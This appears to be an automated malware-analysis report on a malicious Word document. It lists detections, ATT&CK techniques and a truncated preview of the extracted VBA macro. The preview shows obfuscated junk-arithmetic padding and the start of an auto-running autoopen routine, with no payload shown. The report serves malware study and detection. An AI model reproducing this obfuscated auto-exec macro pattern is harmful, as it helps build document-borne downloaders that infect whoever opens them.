MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing a VBA macro with an AutoOpen function, indicating it's designed to execute automatically upon opening. The presence of GetObject calls within the VBA p-code suggests an attempt to execute code or load external resources. The ClamAV detection further confirms its malicious nature, likely acting as a downloader for a secondary stage.
Heuristics 7
-
ClamAV: Doc.Malware.Droo-6895763-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Droo-6895763-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 60956 bytes |
SHA-256: 58d1773ba6c26fe9bc641e3112fedd94fb4bd5dbbd967718abd23289f30e2749 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "uUAAGQ"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function YABAXD()
If SADUQQ = iQBAADC Then
uAAQ_AcB = 888878741 * Z_A1GA
mACXDGwX = KDQZ4D / 538792184 / 648401493 + 540241597 * 905772087 / 824013328 + (toXAXD - Tan(ZcDAAAA + 805681129 - 851011768 - Oct(zAUQZcBD - Hex(768606491) + 36956884 + Oct(892315431))) + (480647307 / Sqr(40570017)))
E1XQxB = 464988884 * SUDXAkBG
End If
If XAoxwXo = qkUUUkB Then
JkwQAAQB = 309639586 * jBGc4D
ZUA4Qx = dAAQAAU / 794003604 / 100734420 + 385941752 * 901536742 / 212631724 + (SoAwxc - Tan(pA_Qkw_ + 512281271 - 677824301 - Oct(NwDAAA - Hex(189007814) + 442545052 + Oct(876327097))) + (871803250 / Sqr(203362537)))
AAABoAx = 32221473 * zBAcAX
End If
If hADcAxG = vBZZBB4c Then
GDCUAAxU = 855403583 * sGCDAc
OQXDCQD = JUxAAGU / 75520102 / 698186674 + 538163502 * 667638725 / 249789112 + (qQ4AXQ - Tan(dADCDC1 + 993441065 - 838481048 - Oct(aQAA1A - Hex(986194334) + 228953373 + Oct(296958164))) + (216628725 / Sqr(447222976)))
zZD1DZX = 176219481 * r1A_BQA
End If
If RoXGok_B = Ox1DQUQ4 Then
vCDZBBA = 295894980 * UCAAAw
ScAXBXw = NwDUoZ / 209823501 / 30696457 + 381666527 * 528298984 / 681695391 + (PAD_BAw - Tan(c4xABoAk + 147684985 - 273512151 - Oct(cAkAQA - Hex(605771107) + 313793255 + Oct(769051826))) + (682560952 / Sqr(418414289)))
iZDDAo = 310648932 * jAG4GA
End If
If DZUB1kD = iBXAwAc Then
wDxAkBB = 685102660 * PAAAcx
j4x_ADD = SAXwcX / 28805962 / 924213397 + 659305860 * 305546913 / 805719473 + (l44QAA - Tan(KAAo1o + 427230615 - 465388462 - Oct(JAA_oADA - Hex(139328790) + 14449318 + Oct(519724927))) + (322441204 / Sqr(700461209)))
bBUBk1AB = 116906929 * tDGA4_X
End If
If zDAckAX = ZUAAAAxA Then
bUxDAwUQ = 828576262 * qwADG1
YDDcZZC = tAAC_Q_A / 910957438 / 7896490 + 11474067 * 754344539 / 400014959 + (RQGZUCQ - Tan(ZAAAAQ + 876080710 - 864828435 - Oct(iBU1AGQX - Hex(747469874) + 300746359 + Oct(750140348))) + (667057452 / Sqr(64534236)))
jcA__Akw = 552311063 * LxXUkA
End If
If TQ_BXA = LAAAAw4o Then
OAUBGUCk = 344232585 * voQAAG
pA_AAA = iDAc1XB / 986043874 / 563166946 + 301960935 * 807096671 / 855556357 + (CUAGA_X - Tan(ckAAxA + 580273531 - 646137033 - Oct(G1QXAoA - Hex(28541599) + 539684308 + Oct(346980475))) + (336587771 / Sqr(865762115)))
JQQUD4 = 541918621 * E4o_AAA
End If
If FUkAAAG = bQ1AUQBA Then
YBAXAxZA = 491993165 * roAZBDDA
WCkDkXZ = ZcUBD4 / 306634791 / 204146704 + 780307494 * 312953431 / 339698840 + (XAUoD1 - Tan(LAcDAoG + 111908974 - 237480094 - Oct(MU4oAxBA - Hex(270982720) + 144136245 + Oct(575722000))) + (18865400 / Sqr(706819969)))
ZDUwAX = 839933053 * dU_AUA
End If
If EDAA4AA = L1QAcxAD Then
oUAxADQG = 435303769 * jAB1ADU
RAAkoACo = AxQAAGx / 69795275 / 875219443 + 48581205 * 62254386 / 265738484 + (NQxccAAw - Tan(XQBCk4AA + 716241499 - 11720814 - Oct(vCZ441B - Hex(402114629) + 828613375 + Oct(68065683))) + (545619320 / Sqr(171020734)))
UcA4QA = 375754650 * bkDCAAAQ
End If
End Function
Sub autoopen()
On Error Resume Next
If lAoCAAxD = u__1AUD Then
nDwA1A = 812616669 * YAAxQA
qwAGCD = SDQAAAA / 416222261 / 997207107 + 394096036 * 322589883 / 519404136 + (ocDc4AG - Tan(WQDBoXDQ + 273806910 - 146596640 - Oct(ExAcQQZx - Hex(140042709) + 719667344 + Oct(235671124))) + (293120058 / Sqr(233511879)))
ic_oA_kD = 889587650 * SwA4ADA
End If
If joAAZAA = mAZxAD Then
uAAQAX = 278701557 * mAA4_cB
dBADA4 = MXDBcoA / 353977103 / 267331403 + 103246264 * 230330714 / 716065697 + (IQxQAGU - Tan(wAZAAAAB + 450182160 - 599796431 - Oct(FAAAQ4AX - Hex(889495288) + 353323007 + Oct(555858182))) + (269642298 / Sqr(901513165)))
DQc_wC = 437399596 * ZAcD_Q
End If
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.